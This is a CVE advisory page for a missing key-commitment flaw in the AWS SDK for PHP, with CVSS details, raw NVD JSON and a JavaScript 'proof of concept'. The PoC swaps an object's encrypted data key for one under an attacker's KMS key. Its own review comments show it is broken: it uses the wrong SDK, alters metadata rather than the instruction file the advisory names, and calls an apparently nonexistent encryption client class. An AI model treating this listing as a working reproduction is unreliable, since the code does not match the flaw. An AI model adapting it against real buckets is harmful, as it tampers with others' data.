Security Vulnerability Report
CVE-2025-14761 CVSS 5.3 MEDIUM

CVE-2025-14761

Published: 2025-12-17 21:15:53
Last Modified: 2026-04-15 00:35:42
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

Missing cryptographic key commitment in the AWS SDK for PHP may allow a user with write access to the S3 bucket to introduce a new encrypted data key (EDK) that decrypts to different plaintext when the EDK is stored in an "instruction file" instead of S3's metadata record. To mitigate this issue, upgrade AWS SDK for PHP to version 3.368.0 or later.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

AWS SDK for PHP < 3.368.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-14761 walk-through: missing key commitment in AWS SDK for PHP (< 3.368.0).
// Scenario from the advisory: a principal with write access to the S3 bucket
// introduces a different encrypted data key (EDK), so the reader decrypts to a
// plaintext the writer never stored. The impact is on integrity, not confidentiality.
//
// NOTE(review): this listing drives the JavaScript `aws-sdk` package, while the
// advisory concerns AWS SDK for PHP. Read it as a sketch of the sequence of
// events, not as a reproduction against the affected library.
//
// Defender takeaway: upgrade to 3.368.0 or later, keep write access to buckets
// holding client-side-encrypted objects as narrow as possible, and review
// write events (object puts and copies) on those objects.
const AWS = require('aws-sdk');

// Placeholder region and credentials shared by both service clients.
const REGION = 'us-east-1';
const placeholderCredentials = {
  accessKeyId: 'ATTACKER_ACCESS_KEY',
  secretAccessKey: 'ATTACKER_SECRET_KEY',
};

const s3 = new AWS.S3({ region: REGION, ...placeholderCredentials });

/**
 * Step 1: fetch the encrypted object and log its `x-amz-key` metadata entry.
 *
 * NOTE(review): the log label says "instruction file", but the value printed
 * is read from the object's own metadata record.
 *
 * @returns {Promise<{Bucket: string, Key: string}>} Bucket/key pair reused by later steps.
 */
async function identifyTarget() {
  const target = { Bucket: 'target-bucket', Key: 'sensitive-data.enc' };

  const response = await s3.getObject(target).promise();
  console.log('Original instruction file:', response.Metadata['x-amz-key']);

  return target;
}

/**
 * Step 2: request a data key under a KMS key other than the data owner's.
 *
 * @returns {Promise<string>} The returned ciphertext blob, base64-encoded.
 */
async function generateMaliciousEDK() {
  const kms = new AWS.KMS({ region: REGION, ...placeholderCredentials });

  const request = {
    KeyId: 'arn:aws:kms:us-east-1:ATTACKER_ACCOUNT:key/MALICIOUS-KEY-ID',
    KeySpec: 'AES_256',
  };
  const { CiphertextBlob } = await kms.generateDataKey(request).promise();

  return CiphertextBlob.toString('base64');
}

/**
 * Step 3: copy the object onto itself with replaced metadata.
 *
 * NOTE(review): this rewrites the object's metadata record. The advisory
 * describes the case where the EDK lives in an instruction file instead, so
 * this step does not match the condition the advisory states.
 *
 * @param {{Bucket: string, Key: string}} targetParams - Object located in step 1.
 * @param {string} maliciousEDK - Base64 value written to `x-amz-key`.
 * @returns {Promise<void>}
 */
async function replaceInstructionFile(targetParams, maliciousEDK) {
  const { Bucket, Key } = targetParams;

  const replacementMetadata = {
    'x-amz-key': maliciousEDK,
    'x-amz-cek-alg': 'AES/GCM/NoPadding',
  };

  await s3
    .copyObject({
      Bucket,
      Key,
      CopySource: `${Bucket}/${Key}`,
      Metadata: replacementMetadata,
      MetadataDirective: 'REPLACE',
    })
    .promise();

  console.log('Instruction file replaced with malicious EDK');
}

/**
 * Step 4: the reading side fetches and decrypts the object.
 *
 * NOTE(review): `AWS.S3EncryptionClient` does not appear to be part of the
 * JavaScript `aws-sdk` package (confirm). The affected encryption client is
 * the PHP one. This function is defined but never called by the driver below.
 *
 * @returns {Promise<void>}
 */
async function victimDecrypts() {
  const encryptionClient = new AWS.S3EncryptionClient({ region: REGION });

  const request = { Bucket: 'target-bucket', Key: 'sensitive-data.enc' };
  const decrypted = await encryptionClient.getObject(request).promise();

  console.log('Decrypted data (attacker-controlled):', decrypted.Body.toString());
}

// Driver: runs steps 1-3 in order; step 4 is left to the reading party.
async function runDemo() {
  const target = await identifyTarget();
  const maliciousEDK = await generateMaliciousEDK();
  await replaceInstructionFile(target, maliciousEDK);
  console.log('Attack completed - victim will decrypt to different plaintext');
}

runDemo();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14761", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-12-17T21:15:53.337", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing cryptographic key commitment in the AWS SDK for PHP may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an \"instruction file\" instead of S3's metadata record.\n\nTo mitigate this issue, upgrade AWS SDK for PHP to version 3.368.0 or later"}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-032/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-sdk-php/releases/tag/3.368.0", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-sdk-php/security/advisories/GHSA-x8cp-jf6f-r4xh", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}